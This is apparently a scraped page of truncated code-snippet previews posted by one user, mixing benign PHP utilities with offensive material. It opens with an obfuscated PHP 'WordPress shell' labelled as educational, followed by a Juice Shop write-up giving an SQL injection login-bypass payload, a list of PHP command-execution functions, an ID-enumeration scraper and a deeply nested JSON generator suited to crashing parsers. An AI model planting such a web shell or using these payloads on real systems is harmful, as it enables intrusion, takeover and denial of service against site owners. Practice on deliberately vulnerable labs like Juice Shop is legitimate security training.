thistehneisen

// Example WordPress shell for educational purposes
<?php for($o=0,$e='&\'()*+,-.:]^_`{|,,,|-((.(*,|)`)&(_(*,+)`(-(,+_(-(.(:(](^(_(`({)]+`+{+|,&-^-_(^)](](^(_(^(:(`(,-_(.-_(](:(,+_(-+_(--_(`(.(.+`+_(-(:(.(,+_(--^(.-_(:+{(]+{(:(:(^(`(,(,(,(.(:(:(:+{(,(_(:(_+_(-)](](,(:-_(,,&(_,&+_(-(`(:(.(,(.(.+_(-(.+`(,-_(.(`(](.(_-^(,)](:({(,(,(_(](.(](.-^(,(,(`(,(](:(.({(]-^+_(-(^+_(-(^(.(](,+`(`,&(:+{(.-^(_-_(`-_(]-^+_(-+{(:-^+_(--^(,(_(:(](,(_(`)](:,&(.(,+_(-+{+_(-+|(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](.(.(.(](,+_(-(,,&(^(`(`(^(]-^(,(.(,(.(:-_+_(-(^(_)](.(.(.(](,+_(-(,,&(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](:(^(.-^(,(_(_(](]+|(`(`(.(.+_(--^(,(.(:+{+_(-+`(`+_(-(:(`(:-_(,,&(,-_(.+{(,+_(-(:)](`+_(-(.+{(_+_(-(_+`+_(-)]+_(-(_(,(.(:(`(`)]+_(-,&(:+`+_(--^(.(.(`(_(,-^(:(`(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+`(:(](:(_(:(,(,-_(`+{(]-^(.(`(`-_+_(-(,(,(^(^-^+_(-(`(,+`(:(_(:+|+_(-({(`+{(],&(,(.(,(.(:-_+_(-(^+_(-)](](:(](^(_(:(`)](^-_(_(:(^+`(_+`(`+_(-(](^(_+_(-(^+{(^+{(^(,+_(-(.(:,&(,(:(:(_(](.(_(:(_,&+_(-(_(]

thistehneisen

This is a write-up of steps that I've done with OWASP Juice Shop incrementally to solve some of the tasks.

Log in as an admin

Navigate to login form and submit Payload in both fields Payload: ' OR '1'='1' --

Finding privacy policy page

Navigate Profile => Privacy & Security => Privacy

Finding the score board

thistehneisen

<?php

$startYear      = 2019;
$endYear        = 2020;

for ($year = $startYear; $year <= $endYear; $year++) {
    $startMonth = 1;
    $endMonth   = 12;
    for ($month = $startMonth; $month <= $endMonth; $month++) {
        $paddedMonth = sprintf("%02d", $month);

thistehneisen

<?php
function lottery649($maxn = "49",$maxb="6") { 
	srand((double)microtime() * 1000000); 
	while (1>0) { 
		$lottery[] = rand(1,$maxn); 
		$lottery = array_unique($lottery); 
		if (sizeof($lottery) == $maxb) break; 
	} 
	sort($lottery); 
	return implode(", ",$lottery); 

thistehneisen

<?php

$addresses  = file('addresses.txt', FILE_IGNORE_NEW_LINES);
$responding = [];

foreach ($addresses as $address) {
    if ($url = parse_url($address)) {
        if (!isset($url['scheme'])) {
            $address = 'http://' . $address;
        }

thistehneisen

%!PS-Adobe-2.0 EPSF-1.2
%%Creator: Adobe Illustrator(TM) 1.2d4
%%For: OpenWindows Version 2
%%Title: vector.eps
%%CreationDate: 4/12/90 3:20 AM
%%DocumentProcSets: Adobe_Illustrator_1.2d1 0 0
%%DocumentSuppliedProcSets: Adobe_Illustrator_1.2d1 0 0
%%BoundingBox: 17 171 567 739
%%EndComments

thistehneisen

Command Execution

exec           - Returns last line of commands output
passthru       - Passes commands output directly to the browser
system         - Passes commands output directly to the browser and returns last line
shell_exec     - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec - Executes a program

thistehneisen

<?php

$baseUrl = 'https://[domain.tld]/?item=[item]&id=[id]';
$maxItems = 1000;
$maxId = 2000;

function getUrl($url, $headersOnly = TRUE) {
    $userAgent = 'Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0';

    $options = [

thistehneisen

#!/bin/bash

output_dir="decompiled"
mkdir -p "$output_dir"

find . -name "*.jar" -exec sh -c '
    for jarfile do
        decompile_dir="$0/$(basename "${jarfile}" .jar)"
        mkdir -p "$decompile_dir"
        jd-cli "$jarfile" -od "$decompile_dir"

thistehneisen

def create_nested_json_string(depth):
    json_string = '{"a":' * depth + '1' + '}' * depth
    return json_string

depth = 10000
nested_json = create_nested_json_string(depth)
print(nested_json)